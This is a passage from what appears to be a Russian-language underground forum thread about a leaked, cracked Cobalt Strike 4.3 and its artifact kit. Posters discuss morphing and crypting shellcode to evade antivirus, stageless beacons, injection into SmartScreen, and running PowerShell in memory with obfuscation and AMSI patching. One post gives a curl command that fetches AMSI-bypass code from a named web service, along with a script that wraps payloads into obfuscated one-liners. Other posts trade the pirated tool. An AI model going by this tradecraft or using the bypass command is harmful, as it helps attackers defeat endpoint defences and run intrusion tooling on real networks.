Пожалуйста, обратите внимание, что пользователь заблокирован
Кинь на самого себя жалобу за то что ты чудак на букву "м". Сталинские времена уже прошли, а жалобы писать не разучились.предлагаю скооперироваться и кидать жалобы телеге.
ибо нефиг.
Кинь на самого себя жалобу за то что ты чудак на букву "м". Сталинские времена уже прошли, а жалобы писать не разучились.предлагаю скооперироваться и кидать жалобы телеге.
ибо нефиг.
ты прав, но зачем через телегу распространять?Кинь на самого себя жалобу за то что ты чудак на букву "м". Сталинские времена уже прошли, а жалобы писать не разучились.
Скрытое содержимое
создание толпы , в толпе проще затеряться))))))))))))ты прав, но зачем через телегу распространять?
чтоб школьники юзали?
один хрен загадится, нужно шеллкод морфить, дописывать. чем больше школьников сольют, тем больше мне будет работы.ты прав, но зачем через телегу распространять?
чтоб школьники юзали?
Ну да, как вариант)создание толпы , в толпе проще затеряться))))))))))))
Чем не устроил перевод в этой теме?Есть мануал на английском. Может кто перевести бесплатно, во благо общества.
Ужас. Морфить шеллкод! Это его морфинчиком, да? Артифакт-кит не менялся уже лет 6, оно и не нужно. За пол-дня (уровень кодера с++ где-то 0.1 из 5) без морфина и прочей чуши получил стабильный stageless бикон, попутно "поправил" сам cobaltstrike (уровень кодера java еще меньше). Сделал стабильный инжект в смартскрин (скрипту тыщща лет, сегодня немного дописал просто). Насчет какая у кого версия - смех =) Багами вы называете EICAR в шеллкоде?))))))один хрен загадится, нужно шеллкод морфить, дописывать. чем больше школьников сольют, тем больше мне будет работы.
колесо сансары повернулось!
Криптор, дельфи, пистолет
Я криптую с семи лет!
PS уже все кому не лень сливают, как минимум два канала, врятли школьники знают зачем им кобальт, врятли они понимают как много людей его пользуют. а те кто зарабатывает на нем, могут и купить крипт, в лучшем случае сделать его самостоятельно. и не факт что источник канала и данный пост имеют одинаковое происхождение. я к сожалению не могу заглянуть под хайд и сравнить. всего лишь навыки гугла помогли заполучить версию
а навыки нахлебника помогли заполучить артефакт кит, который я ковыряю сейчас дабы разобраться в нем, и в будущем улутшить (надеюсь).
а вот ныть про хайды, это глупо, лучше поставь яше лайк за то что он сказал тебе о том что кобальт слит, и не гунди, делай свою работу дальше, сам же такой же грешный как и мы все, и покоя тебе не будет, как и нам всем
Блин. Забыл, а то ща начнется, пруууууф))) пруф вот =>один хрен загадится, нужно шеллкод морфить, дописывать. чем больше школьников сольют, тем больше мне будет работы.
колесо сансары повернулось!
Криптор, дельфи, пистолет
Я криптую с семи лет!
PS уже все кому не лень сливают, как минимум два канала, врятли школьники знают зачем им кобальт, врятли они понимают как много людей его пользуют. а те кто зарабатывает на нем, могут и купить крипт, в лучшем случае сделать его самостоятельно. и не факт что источник канала и данный пост имеют одинаковое происхождение. я к сожалению не могу заглянуть под хайд и сравнить. всего лишь навыки гугла помогли заполучить версию
а навыки нахлебника помогли заполучить артефакт кит, который я ковыряю сейчас дабы разобраться в нем, и в будущем улутшить (надеюсь).
а вот ныть про хайды, это глупо, лучше поставь яше лайк за то что он сказал тебе о том что кобальт слит, и не гунди, делай свою работу дальше, сам же такой же грешный как и мы все, и покоя тебе не будет, как и нам всем
Так как наш с тобой срач удалили, я тебе расскажу для чего это делается...Ужас. Морфить шеллкод! Это его морфинчиком, да?
Я про баги вообще ничего не говорил, и меня бесит что ты припысываешь мне "не мои" словаБагами вы называете EICAR в шеллкоде
Пожалуйста нормально общайся, если хочешь что бы с тобой нормально общалисьЭто его морфинчиком, да?
Так как наш с тобой срач удалили, я тебе расскажу для чего это делается...
Зачастую при использовании этого софта - нужно подстраиваться по то что он предназначен для аттаки на сети
Из чего следует что зачастую приходится использовать например powershell. И бинарный файл это слишком другое,
что бы запускать его через "PSExec", требуется баллансировать на интерпретируемом языке powershell, для того что бы
не дропать на диск бинарный файл как у тебя, а запускать его из памяти, при этом обусфицируя как и пауршелл, так и
патчить амси
Я про баги вообще ничего не говорил, и меня бесит что ты припысываешь мне "не мои" слова
Пожалуйста нормально общайся, если хочешь что бы с тобой нормально общались
Я не понимаю из за чего ты до меня пристал, не понимаю хоть убей. Я вообще как мы выяснили ранее - ПТУшник, и со мной дел не стоит иметь, и под шконкой мое место.
И не имеет смысла тебя учить хоть чему то - потому что ты очень много знаешь. Так что я даже не жду что ты ответишь что то внятное.
curl -sL https://amsi-fail.azurewebsites.net/api/Generate | tail -n+2 . ну и я совсем уж добрый (не для тебя, ПТУшника) кому нужно: прикрепленный файл делаем исполняемым chmod +x xen.txt и просто ./xen.txt ваш_скрипт.ps1 => получим one-liner (кстати очень удобная штука есть с одноименным названием, pip3 install one-lin3r) =). Ваш модифицированный скрипт включает и амси-патчинг и исполнение через нагрузку процессора и остальные приятные плюшки =)При установки пишет что отсутствует cobaltstrike.authСкрытое содержимое
Ещё один Кобальта 4.3 со всеми плагинами
you can download froe hereПри установки пишет что отсутствует cobaltstrike.auth
Может кто поделится опытом, что делаю не так? (debian 10)